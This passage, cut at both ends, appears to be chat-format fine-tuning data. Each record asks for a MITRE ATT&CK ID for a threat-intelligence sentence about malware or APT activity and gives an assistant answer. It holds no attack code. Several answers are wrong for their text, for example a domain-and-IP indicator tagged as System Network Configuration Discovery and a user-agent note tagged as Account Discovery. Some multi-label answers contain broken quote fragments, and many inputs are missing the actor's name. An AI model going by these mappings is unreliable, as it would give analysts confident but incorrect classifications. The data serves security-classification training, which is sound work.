- "content": "After we decrypted the additional shellcode, we determined that the functional shellcode is part of the Metasploit Framework, specifically using the block_api.asm code to resolve API function names and the block_reverse_http.asm code to obtain additional shellcode to execute on the system"
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information', 'T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Hydraq creates a backdoor through which remote attackers can check for the existence of files, including its own components, as well as retrieve a list of logical drives."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "MegaCortex can wipe deleted data from all drives using \"cipher.exe\"."
- },
- {
- "role": "assistant",
- "content": "T1561.001 - Disk Content Wipe"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses HTTP or HTTPS for C2."
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "RTM has relied on users opening malicious email attachments, decompressing the attached archive, and double-clicking the executable within."
- },
- {
- "role": "assistant",
- "content": "T1204.002 - User Execution: Malicious File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "AppleJeus has deleted the MSI file after installation."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Compiled HTML File (CHM) are commonly Microsoft help files. These file will be a compiled HTML files that includes documents , image , scripts etc. Hackers will abuse these files to embed malicious payload with CHM files. CHM files can be executed by HH.exe , which is a Microsoft windows utility. Adversaries use this techniques to evade AV or application blacklisting techniques."
- },
- {
- "role": "assistant",
- "content": "T1218 - Signed Binary Proxy Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "DarkHydrus has used \"-WindowStyle Hidden\" to conceal PowerShell windows."
- },
- {
- "role": "assistant",
- "content": "T1564.003 - Hide Artifacts: Hidden Window"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Calisto can collect data from user directories."
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Once inside the network of a hospitality company, APT28 sought out machines that controlled both guest and internal Wi-Fi networks. No guest credentials were observed being stolen at the compromised hotels; however, in a separate incident that occurred in Fall 2016, APT28 gained initial access to a victim’s network via credentials likely stolen from a hotel Wi-Fi network. Upon gaining access to the machines connected to corporate and guest Wi-Fi networks, APT28 deployed Responder"
- },
- {
- "role": "assistant",
- "content": "T1018 - Remote System Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "kaudited — A file installed as /usr/bin/kaudited. This binary will drop and install several loadable kernel modules (LKMs) on the infected machine. To ensure that the infected machine won’t crash due to the kernel-mode rootkits, it uses different modules for specific kernel versions"
- },
- {
- "role": "assistant",
- "content": "T1547.006 - Boot or Logon Autostart Execution: Kernel Modules and Extensions"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This would save them the trouble of needing to load additional malware to exfiltrate files or other material. We are aware of no evidence of follow-up interactions between the operators and successful victims as part of any extortion attempts. Furthermore, Stealth Falcon’s use of JavaScript to profile and de-anonymize victims seems inconsistent with a primary motivation of collecting information that could be used for blackmail"
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Gamaredon is an advanced persistent threat (APT) group that has been active since 2013. From late 2019 to February of this year, researchers published several reports on Gamaredon, tracking the group’s activities"
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information', 'T1059.005 - Command and Scripting Interpreter: Visual Basic"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Stolen Pencil has a tool to add a Windows admin account in order to allow them to ensure continued access via RDP."
- },
- {
- "role": "assistant",
- "content": "T1078.003 - Valid Accounts: Local Accounts"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Backdoor.Oldrea can use rundll32 for execution on compromised hosts."
- },
- {
- "role": "assistant",
- "content": "T1218.011 - Signed Binary Proxy Execution: Rundll32"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SMOKEDHAM can execute Powershell commands sent from its C2 server."
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "However, we were able determine a unique, hard-coded user agent used for the C2 communications: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; InfoPath.1) Using AutoFocus, we pivoted from the user agent string to expand our data set to three additional Zebrocy samples using the exact same user agent"
- },
- {
- "role": "assistant",
- "content": "T1087 - Account Discovery', 'T1543.001 - Create or Modify System Process: Launch Agent"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TajMahal has the ability to capture VoiceIP application audio on an infected host."
- },
- {
- "role": "assistant",
- "content": "T1123 - Audio Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has a command to disable routing and the Firewall on the victim’s machine."
- },
- {
- "role": "assistant",
- "content": "T1562.001 - Impair Defenses: Disable or Modify Tools"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A backdoor used by created a Tor hidden service to forward traffic from the Tor client to local ports 3389 (RDP), 139 (Netbios), and 445 (SMB) enabling full remote access from outside the network."
- },
- {
- "role": "assistant",
- "content": "T1090.003 - Proxy: Multi-hop Proxy"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "My blog post, “Remote Mac Exploitation Via Custom URL Schemes”, describes the technical details of how WindShift (ab)used custom URL schemes to infect macOS systems"
- },
- {
- "role": "assistant",
- "content": "T1189 - Drive-by Compromise"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Zeus Panda checks for the existence of a Registry key and if it contains certain values."
- },
- {
- "role": "assistant",
- "content": "T1012 - Query Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Some versions have an embedded DLL known as MockDll that uses and regsvr32 to execute another payload."
- },
- {
- "role": "assistant",
- "content": "T1218.010 - Signed Binary Proxy Execution: Regsvr32"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Nomadic Octopus has used malicious macros to download additional files to the victim's machine."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Operation Wocao has used the \"tasklist\" command to search for one of its backdoors."
- },
- {
- "role": "assistant",
- "content": "T1007 - System Service Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Leafminer infected victims using JavaScript code."
- },
- {
- "role": "assistant",
- "content": "T1059.007 - Command and Scripting Interpreter: JavaScript"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kimsuky has obtained and used tools such as Nirsoft WebBrowserPassVIew, Mimikatz, and PsExec."
- },
- {
- "role": "assistant",
- "content": "T1588.002 - Tool"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Industroyer’s 61850 payload component enumerates connected network adapters and their corresponding IP addresses."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "As we mentioned, the adversary used a technique called template injection. A .docx file is a zip file containing multiple parts. Using the template injection technique, the adversary puts a link towards the template file in one of the .XML files, for example the link is in settings.xml.rels while the external oleobject load is in document.xml.rels. The link will load a template file (DOTM) from a remote server. Some of these template files are renamed as JPEG files when hosted on a remote server to avoid any suspicion and bypass detection. These template files contain Visual Basic macro code, that will load a DLL implant onto the victim’s system"
- },
- {
- "role": "assistant",
- "content": "T1036 - Masquerading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "UNC2452 routinely removed their tools, including custom backdoors, once remote access was achieved."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "LAPSUS$ has gathered detailed knowledge of an organization's supply chain relationships."
- },
- {
- "role": "assistant",
- "content": "T1591.002 - Business Relationships"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Sandworm Team has researched software code to enable supply-chain operations, most notably for the 2017 NotPetya attack. Sandworm Team also collected a list of computers using specific software as part of its targeting efforts."
- },
- {
- "role": "assistant",
- "content": "T1592.002 - Software"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "yty”, the name we use for the framework, from the PDB path string. A “bot id” consisting of computer name, user name, and volume serial number separated by dashes"
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The account names visually look similar to legitimate government organization names or other trusted third-party entities"
- },
- {
- "role": "assistant",
- "content": "T1036 - Masquerading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "2 Successful payload download Astaroth’s initial payload is a malicious .lnk file, a common delivery method used by threat actors"
- },
- {
- "role": "assistant",
- "content": "T1547.009 - Boot or Logon Autostart Execution: Shortcut Modification"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Operation Wocao has used Impacket's smbexec.py as well as accessing the C$ and IPC$ shares to move laterally."
- },
- {
- "role": "assistant",
- "content": "T1021.002 - Remote Services: SMB/Windows Admin Shares"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The document may also display the fake message “This document is protected” to entice users to enable content and execute malicious code. The .docx file contained embedded x86 and x64 versions of the payload DLL so that the appropriate version was dropped depending on the target operating system"
- },
- {
- "role": "assistant",
- "content": "T1204.002 - User Execution: Malicious File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "conducts brute force attacks against SSH services to gain initial access."
- },
- {
- "role": "assistant",
- "content": "T1110 - Brute Force"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Sandworm Team has used port 6789 to accept connections on the group's SSH server."
- },
- {
- "role": "assistant",
- "content": "T1571 - Non-Standard Port"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "For readers unaware of ngrok, this site is a simple reverse proxy used to let Internet-based users connect to servers located behind firewalls or on local machines that don't have a public IP address"
- },
- {
- "role": "assistant",
- "content": "T1090 - Proxy"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Fox Kitten has accessed victim security and IT environments and Microsoft Teams to mine valuable information."
- },
- {
- "role": "assistant",
- "content": "T1213 - Data from Information Repositories"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PoisonIvy creates a backdoor through which remote attackers can upload files."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Stealth Falcon malware creates a scheduled task entitled “IE Web Cache” to execute a malicious file hourly."
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "1) These lure documents attempt to exploit the Microsoft Office Dynamic Data Exchange (DDE) protocol in order to gain access to victim machines. 2) Once the Gallmaker attackers gain access to a device, they execute various tools, including"
- },
- {
- "role": "assistant",
- "content": "T1204.002 - User Execution: Malicious File', 'T1559.002 - Inter-Process Communication: Dynamic Data Exchange"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "chinapolicyanalysis.org 185.130.212.168 Domain used for spear phish sender e-mail address and to host malicious documents"
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kimsuky can gather a list of all processes running on a victim's machine."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Several malware samples use a common function to identify target files by their extension. malware families can also enumerate files and directories, including a Destover-like variant that lists files and gathers information for all drives."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has a module to clear event logs with PowerShell."
- },
- {
- "role": "assistant",
- "content": "T1070 - Indicator Removal on Host"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Chinese state-sponsored cyber actors have been observed using commands, including tasklist, jobs, ps, or taskmgr, to reveal the running processes on victim devices."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TrickBot collects the users of the system."
- },
- {
- "role": "assistant",
- "content": "T1087.001 - Account Discovery: Local Account"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has used regsvr32.exe to execute a server variant of in victim networks."
- },
- {
- "role": "assistant",
- "content": "T1218.010 - Signed Binary Proxy Execution: Regsvr32"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Green Lambert can delete the original executable after initial installation in addition to unused functions."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can overwrite Registry settings to reduce its visibility on the victim."
- },
- {
- "role": "assistant",
- "content": "T1070 - Indicator Removal on Host"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Post-compromise, APT39 leverages custom backdoors such as SEAWEED, CACHEMONEY, and a unique variant of POWBAT to establish a foothold in a target environment. Internal reconnaissance has been performed using custom scripts and both freely available and custom tools such as the port scanner, BLUETORCH"
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter', 'T1046 - Network Service Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "is capable of opening a command terminal."
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TrickBot uses brute-force attack against RDP with rdpscanDll module."
- },
- {
- "role": "assistant",
- "content": "T1110.004 - Brute Force: Credential Stuffing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Domains The RoyalCli backdoor was attempting to communicate to the following domains: News.memozilla[.]org video.memozilla[.]org The BS2005 backdoor utilised the following domains for C2: Run.linodepower[.]com Singa.linodepower[.]com log.autocount[.]org RoyalDNS backdoor was seen communicating to the domain: andspurs[.]com Possible linked APT15 domains include: Micakiz.wikaba[.]org cavanic9[.]net ridingduck[.]com zipcodeterm[.]com dnsapp[.]info Published date: 10 March 2018 Written by: Rob Smallridge"
- },
- {
- "role": "assistant",
- "content": "T1008 - Fallback Channels"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "jRAT has the capability to take screenshots of the victim’s machine."
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses Domain Fronting to disguise the destination of network traffic as another server that is hosted in the same Content Delivery Network (CDN) as the intended desitnation."
- },
- {
- "role": "assistant",
- "content": "T1090.004 - Domain Fronting"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can be added as a service to establish persistence."
- },
- {
- "role": "assistant",
- "content": "T1543.003 - Create or Modify System Process: Windows Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Emotet has used cmd.exe to run a PowerShell script."
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter', 'T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Threat Group-3390 has packed malware and tools."
- },
- {
- "role": "assistant",
- "content": "T1027.002 - Obfuscated Files or Information: Software Packing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Mustang Panda has gathered system information using \"systeminfo\"."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TEMP.Veles utilized RDP throughout an operation."
- },
- {
- "role": "assistant",
- "content": "T1021.001 - Remote Services: Remote Desktop Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "packs a plugin with UPX."
- },
- {
- "role": "assistant",
- "content": "T1027.002 - Obfuscated Files or Information: Software Packing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Milan can use `cmd.exe` for discovery actions on a targeted system."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The sample, in the form of an RTF document, exploited CVE-2016-4117 to download and install a program from a remote C&C server"
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "sqlmap can be used to automate exploitation of SQL injection vulnerabilities."
- },
- {
- "role": "assistant",
- "content": "T1190 - Exploit Public-Facing Application"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ke3chang performs discovery of permission groups \"net group /domain\"."
- },
- {
- "role": "assistant",
- "content": "T1069.002 - Permission Groups Discovery: Domain Groups"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Agent Tesla can log keystrokes on the victim’s machine."
- },
- {
- "role": "assistant",
- "content": "T1056.001 - Input Capture: Keylogging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "IndigoZebra has established domains, some of which were designed to look like official government domains, for their operations."
- },
- {
- "role": "assistant",
- "content": "T1583.001 - Domains"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Lokibot has obfuscated strings with base64 encoding."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "achieves persistence by creating a shortcut to itself in the CSIDL_STARTUP directory."
- },
- {
- "role": "assistant",
- "content": "T1547.009 - Boot or Logon Autostart Execution: Shortcut Modification', 'T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
